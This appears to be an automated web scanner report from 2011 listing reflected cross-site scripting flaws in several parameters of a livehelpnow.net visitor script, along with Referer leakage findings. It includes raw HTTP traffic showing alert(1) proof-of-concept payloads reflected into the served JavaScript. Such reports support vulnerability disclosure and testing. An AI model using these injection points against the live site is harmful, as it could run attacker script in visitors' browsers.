1. Cross-site scripting (reflected)
1.1. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]
1.2. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]
1.3. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [t parameter]
1.4. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]
2. Cross-domain Referer leakage
Severity: | High |
Confidence: | Certain |
Host: | http://www.livehelpnow |
Path: | /lhn/scripts/lhnvisitor |
GET /lhn/scripts/lhnvisitor Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracuda Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache Date: Sat, 26 Feb 2011 14:15:54 GMT Pragma: no-cache Content-Type: text/javascript; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Vary: Accept-Encoding Content-Length: 9812 var lhnTrack='f'; if (typeof lhnInstalled !='undefined'){lhnTrack= var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=0; InviteRepeats=0; function pa ...[SNIP]... <!--HTTPS OR NOT: RELEASENOTE--> if (document.location { window.open('https://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.livehelpnow |
Path: | /lhn/scripts/lhnvisitor |
GET /lhn/scripts/lhnvisitor Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracuda Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache Date: Sat, 26 Feb 2011 14:15:54 GMT Pragma: no-cache Content-Type: text/javascript; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Vary: Accept-Encoding Content-Length: 9822 var lhnTrack='f'; if (typeof lhnInstalled !='undefined'){lhnTrack= var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=0; InviteRepeats=0; function pa ...[SNIP]... <img style='position:absolute ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.livehelpnow |
Path: | /lhn/scripts/lhnvisitor |
GET /lhn/scripts/lhnvisitor Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracuda Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache Date: Sat, 26 Feb 2011 14:16:04 GMT Pragma: no-cache Content-Type: text/javascript; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Vary: Accept-Encoding Content-Length: 9570 var lhnTrack='f93b1c';alert(1)/ if (typeof lhnInstalled !='undefined'){lhnTrack= var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=0; InviteRepeats=0; function pausecomp(millis) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.livehelpnow |
Path: | /lhn/scripts/lhnvisitor |
GET /lhn/scripts/lhnvisitor Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracuda Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache Date: Sat, 26 Feb 2011 14:15:53 GMT Pragma: no-cache Content-Type: text/javascript; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Vary: Accept-Encoding Content-Length: 9650 var lhnTrack='f'; if (typeof lhnInstalled !='undefined'){lhnTrack= var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=0; InviteRepeats=0; function pa ...[SNIP]... mageserver.ashx?lhnid=" + 1288 + "&navname=" + lhnbrowser + "&java=" + lhnjava + "&referrer=" + lhnreferrer + "&pagetitle=" + lhnpagetitle + "&pageurl=" + lhnsPath + "&page=" + lhnsPage + "&zimg=" + 60d46f1;alert(1)/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.livehelpnow |
Path: | /lhn/functions/image |
GET /lhn/functions/image Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracuda Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Date: Sat, 26 Feb 2011 14:15:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Location: https://www.barracud Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 165 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href='https://www </body></html> |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.livehelpnow |
Path: | /lhn/scripts/lhnvisitor |
GET /lhn/scripts/lhnvisitor Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracuda Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache Date: Sat, 26 Feb 2011 14:15:39 GMT Pragma: no-cache Content-Type: text/javascript; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Vary: Accept-Encoding Content-Length: 9542 var lhnTrack='f'; if (typeof lhnInstalled !='undefined'){lhnTrack= var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=0; InviteRepeats=0; function pa ...[SNIP]... reen.width - 580-32) / 2; var wtop = (screen.height - 420-96) / 2; if (document.location { window.open('https://www } else { window.open('http://www ...[SNIP]... |